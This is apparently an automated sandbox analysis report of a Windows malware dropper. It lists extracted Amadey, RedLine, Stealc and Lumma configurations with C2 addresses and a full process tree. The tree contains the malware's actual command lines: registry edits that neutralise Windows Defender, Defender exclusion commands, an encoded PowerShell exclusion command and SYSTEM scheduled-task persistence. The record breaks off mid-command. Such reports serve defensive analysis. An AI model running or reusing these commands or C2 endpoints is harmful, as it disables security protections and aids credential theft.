Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-08-2024 16:39

General

  • Target

    4aac8eb6ddaa80532f39a15deea7b86989546dfe18c6c1687417c882f0ca022b.exe

  • Size

    1.9MB

  • MD5

    c2f02a32a9117e64de874c5faad5d8a2

  • SHA1

    a6c458a38de8b2d717378e210e94bad516b7a851

  • SHA256

    4aac8eb6ddaa80532f39a15deea7b86989546dfe18c6c1687417c882f0ca022b

  • SHA512

    a78c4987d43f899d0272be31c7148daa1aa6f3e72ca1cff6a6a158b17cd91fde401d2a10085c2d5f57bfe77c3d80182f9ab3394738460620e5ed094117fc38c8

  • SSDEEP

    49152:rF0t7qvgKmmsKQ8zTHz9DPFOsQt0mnSsXp:rWqoEhQAz3Ott0YSsZ

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

amadey

Version

4.41

Botnet

1176f2

C2

http://185.215.113.19

Attributes
  • install_dir

    417fd29867

  • install_file

    ednfoki.exe

  • strings_key

    183201dc3defc4394182b4bff63c4065

  • url_paths

    /CoreOPT/index.php

rc4.plain

Extracted

Family

lumma

C2

https://femininedspzmhu.shop/api

https://locatedblsoqp.shop/api

https://traineiwnqo.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects ZharkBot payload 1 IoCs

    ZharkBot is a botnet written C++.

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • ZharkBot

    ZharkBot is a botnet written C++.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 27 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 3 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\4aac8eb6ddaa80532f39a15deea7b86989546dfe18c6c1687417c882f0ca022b.exe
    "C:\Users\Admin\AppData\Local\Temp\4aac8eb6ddaa80532f39a15deea7b86989546dfe18c6c1687417c882f0ca022b.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2408
    • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:916
      • C:\Users\Admin\AppData\Local\Temp\1000002001\crypted.exe
        "C:\Users\Admin\AppData\Local\Temp\1000002001\crypted.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2868
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4748
      • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
        "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3760
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3164
          • C:\Users\Admin\AppData\Roaming\TKpnu4RdgW.exe
            "C:\Users\Admin\AppData\Roaming\TKpnu4RdgW.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4144
          • C:\Users\Admin\AppData\Roaming\Mz1XuVzMkX.exe
            "C:\Users\Admin\AppData\Roaming\Mz1XuVzMkX.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1616
      • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
        "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Windows directory
        • Suspicious use of WriteProcessMemory
        PID:4260
        • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
          "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
          4⤵
          • Executes dropped EXE
          PID:1584
      • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
        "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:4284
      • C:\Users\Admin\AppData\Local\Temp\1000129001\caesium-image-compressor.exe
        "C:\Users\Admin\AppData\Local\Temp\1000129001\caesium-image-compressor.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3792
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
            PID:4052
        • C:\Users\Admin\AppData\Local\Temp\1000191001\BitcoinCore.exe
          "C:\Users\Admin\AppData\Local\Temp\1000191001\BitcoinCore.exe"
          3⤵
          • Executes dropped EXE
          PID:4820
        • C:\Users\Admin\AppData\Local\Temp\1000228001\PureSyncInst.exe
          "C:\Users\Admin\AppData\Local\Temp\1000228001\PureSyncInst.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:1572
          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:5724
        • C:\Users\Admin\1000238002\Amadeus.exe
          "C:\Users\Admin\1000238002\Amadeus.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2308
          • C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
            "C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe"
            4⤵
            • Executes dropped EXE
            PID:4368
            • C:\Users\Admin\AppData\Local\Temp\7zS40AE.tmp\Install.exe
              .\Install.exe
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2120
              • C:\Users\Admin\AppData\Local\Temp\7zS436D.tmp\Install.exe
                .\Install.exe /kHdidM "385107" /S
                6⤵
                • Checks BIOS information in registry
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Enumerates system info in registry
                PID:1316
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  7⤵
                    PID:4984
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                      8⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:5268
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                        9⤵
                          PID:5284
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                            10⤵
                            • System Location Discovery: System Language Discovery
                            PID:5300
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                        8⤵
                        • Indirect Command Execution
                        PID:5312
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                          9⤵
                            PID:5324
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                              10⤵
                              • System Location Discovery: System Language Discovery
                              PID:5340
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                          8⤵
                          • Indirect Command Execution
                          • System Location Discovery: System Language Discovery
                          PID:5356
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                            9⤵
                              PID:5368
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                10⤵
                                • System Location Discovery: System Language Discovery
                                PID:5384
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                            8⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:5400
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                              9⤵
                              • System Location Discovery: System Language Discovery
                              PID:5412
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                10⤵
                                • System Location Discovery: System Language Discovery
                                PID:5428
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                            8⤵
                            • Indirect Command Execution
                            PID:5444
                            • C:\Windows\SysWOW64\cmd.exe
                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                              9⤵
                              • System Location Discovery: System Language Discovery
                              PID:5456
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                10⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:7060
                                • C:\Windows\SysWOW64\gpupdate.exe
                                  "C:\Windows\system32\gpupdate.exe" /force
                                  11⤵
                                    PID:1188
                          • C:\Windows\SysWOW64\forfiles.exe
                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                            7⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:2988
                            • C:\Windows\SysWOW64\cmd.exe
                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                              8⤵
                                PID:3744
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                  9⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2968
                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                    10⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:6188
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /CREATE /TN "bISIDNXXYteSJEZXLD" /SC once /ST 16:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS436D.tmp\Install.exe\" W7 /OKiRdidChP 385107 /S" /V1 /F
                              7⤵
                              • Drops file in Windows directory
                              • Scheduled Task/Job: Scheduled Task
                              PID:5136
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1316 -s 704
                              7⤵
                              • Program crash
                              PID:7164
                      • C:\Users\Admin\AppData\Local\Temp\1000267001\52i.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000267001\52i.exe"
                        4⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4856
                      • C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:2460
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2460 -s 488
                          5⤵
                          • Program crash
                          PID:5700
                    • C:\Users\Admin\AppData\Local\Temp\1000239001\runtime.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000239001\runtime.exe"
                      3⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3012
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3140
                • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                  C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                  1⤵
                  • Executes dropped EXE
                  PID:2556
                • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                  C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                  1⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3268
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2460 -ip 2460
                  1⤵
                    PID:5760
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5724 -ip 5724
                    1⤵
                      PID:6508
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUA
                      1⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:6576
                    • C:\Users\Admin\AppData\Local\Temp\7zS436D.tmp\Install.exe
                      C:\Users\Admin\AppData\Local\Temp\7zS436D.tmp\Install.exe W7 /OKiRdidChP 385107 /S
                      1⤵
                      • Executes dropped EXE
                      • Drops desktop.ini file(s)
                      • Drops file in System32 directory
                      • System Location Discovery: System Language Discovery
                      • Modifies data under HKEY_USERS
                      PID:968
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                        2⤵
                          PID:6640
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                            3⤵
                            • Indirect Command Execution
                            PID:6828
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              4⤵
                                PID:6948
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                  5⤵
                                    PID:6988
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                3⤵
                                • Indirect Command Execution
                                PID:7080
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:6312
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                    5⤵
                                      PID:4772
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                  3⤵
                                  • Indirect Command Execution
                                  • System Location Discovery: System Language Discovery
                                  PID:2480
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5936
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                      5⤵
                                        PID:4140
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                    3⤵
                                    • Indirect Command Execution
                                    • System Location Discovery: System Language Discovery
                                    PID:5788
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                      4⤵
                                        PID:5796
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                          5⤵
                                            PID:5200
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                        3⤵
                                        • Indirect Command Execution
                                        • System Location Discovery: System Language Discovery
                                        PID:5876
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                          4⤵
                                            PID:5208
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                              5⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Drops file in System32 directory
                                              • System Location Discovery: System Language Discovery
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5584
                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                "C:\Windows\system32\gpupdate.exe" /force
                                                6⤵
                                                  PID:5504
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 